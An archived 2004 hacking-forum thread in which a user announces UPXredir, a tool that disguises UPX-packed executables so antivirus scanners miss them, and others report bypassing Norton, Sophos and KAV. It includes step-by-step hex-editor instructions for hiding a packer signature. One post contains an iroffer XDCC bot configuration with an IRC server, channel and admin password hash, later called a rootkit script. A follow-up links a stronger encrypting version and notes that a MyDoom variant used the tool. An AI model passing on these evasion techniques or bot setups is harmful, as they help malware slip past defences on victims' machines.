hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Upxredir
archphase
UPXredir

This tool takes a packed UPX file and smacks on a section and does a few more things of trickery to transform it to not look like a UPX packed file so when anti-virii comes only they can't decompress the packed data and see it's raw form. Includes sourcecode and binary, written in Delphi 6.

Screenshot: http://archphase.united.net.kg/upxredir.bmp


I tested it on KAV online virii scan and seems to bypass measures there and seeing as KAV is the best in my mind i think it would follow that NAV/McAffe would miss it too, but feedback is appreciated.

get it @: http://nuclearwinter.e-plutonia.com or http://archphase.united.net.kg
Thom
Thank you dude, great tool. I think I bypassed Norton AntiVirus with it biggrin.gif
onlinepass
Cool Dude...

I havent tried it yet...but its really great to get the idea to do it...

Onlinepass
BuzzDee
hehe the tool worx perfectl!
i have sophos on my pc and norton on another and both avs couldnt find a virus after packing ^^

greetz
Double-=V=-
Wow very nice. thanks.
UnDeRTaKeR
Very Nice DuDe! 10x!
archphase
Thxs guys makes my work all the more desirable, very trival method, I doubt they'll pick it up, if they do I'll come up w/ something new.
SkyRaVeR
many th@nx dude smile.gif nice work !
net
hehe worX great .. thanx mate smile.gif
boshcash
nice job .. when i try it i will tell u my opinion , this program would help me much !
GhostCow
sweet archphase!
Alexander01
ive packed my whole collection with it and a lot exe's doesn't work anymore.. but the ones that still work are undetectable for AV now so nice tool anyway
BeNiNuK
hehe kewl
BLSP
QUOTE (BeNiNuK @ Jan 22 2004, 08:54 PM)
hehe kewl



And wtf are u trying to do with that exe .... dry.gif
Thom
/me agrees with BLSP
vnet576
Thats his xdcc bot in a rar sfx executable package...perhaps someone wants to decrypt his iroffer password (unix based use JTR) and bring down his botnet, and maybe next time he'll think before he posts things like this.
Thom
haha no shit
Path=C:\winnt\system32\
SavePath
Setup=C:\winnt\system32\start.bat
Silent=1
Overwrite=1

server irc.rizon.net 6667
channel #PrO-WaReZ -plist 14
adminpass aqoOVCBv2fTGs
adminhost *@*
adminhost *@*

BeNiNuK
it aint a botnet its a rootkit script u just send it to a bot and exec it put it in the wrong downloads thingi though was supposed to put it in the jab rootkit 1
Thom
Calm down BeNiNuK, pls dont come harras me on IRC networks, dont make such a big deal of it.
nulladd
nice one BeNiNuK, not detectable by AV either (22nd jan defintions)
can u give more info on this, what sort of functions does it have, etc
Thom
its a xdcc bot(www.iroffer.org) its used for making computers send out files over IRC.
nulladd
thanks thom, although ive heard of iroffer before i was just a bit confused when BeNiNuK said it wasnt a botnet
eXtErNaL
cool.gif
jead99
Wow, works very well, thanks alot for sharing smile.gif
r3L4x
QUOTE (Alexander01 @ Jan 21 2004, 12:36 AM)
ive packed my whole collection with it and a lot exe's doesn't work anymore.. but the ones that still work are undetectable for AV now so nice tool anyway

dosnt work with files that sore past eof rolleyes.gif rolleyes.gif rolleyes.gif
wicked
it aint hard to use a basic method which I explained in detail a while ago now...

BTW this method should work with jst about any compactor....

[1] Get a Hex Editor like psedit or Ultra-edit
[2] Open compressed File.
[3] search for String "UPX" or "upx"
[4] replace with "EHH" or whatever.
[5] try opening it with compactor
[6] Error filetype Unrecognised....

Simple.

Wkd...

I think that you could create a simple ASM proggy to Achieve the above Mentioned Tactic... but it would be nice to be able to also Reverse it if you wanted to in the future also...

Wkd...
clubfed
more advanced upxcrypt available: http://archphase.united.net.kg/files/upxcrypt.rar
archphase
QUOTE (clubfed @ Jan 31 2004, 12:40 PM)
more advanced upxcrypt available: http://archphase.united.net.kg/files/upxcrypt.rar

Oh yeh i forgot to post all around about UPXcrypt. It seems KAV have already detected the tool and again aren't give me credits :'(. Anyways UPXcrypt adds an actual encryption/decryption engine, won't chop EOF data (r3l4x :-p). Seems some anti-virii companies had to pick it up and look at UPXredir as the .B variant of MyDoom was messed with it heh.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.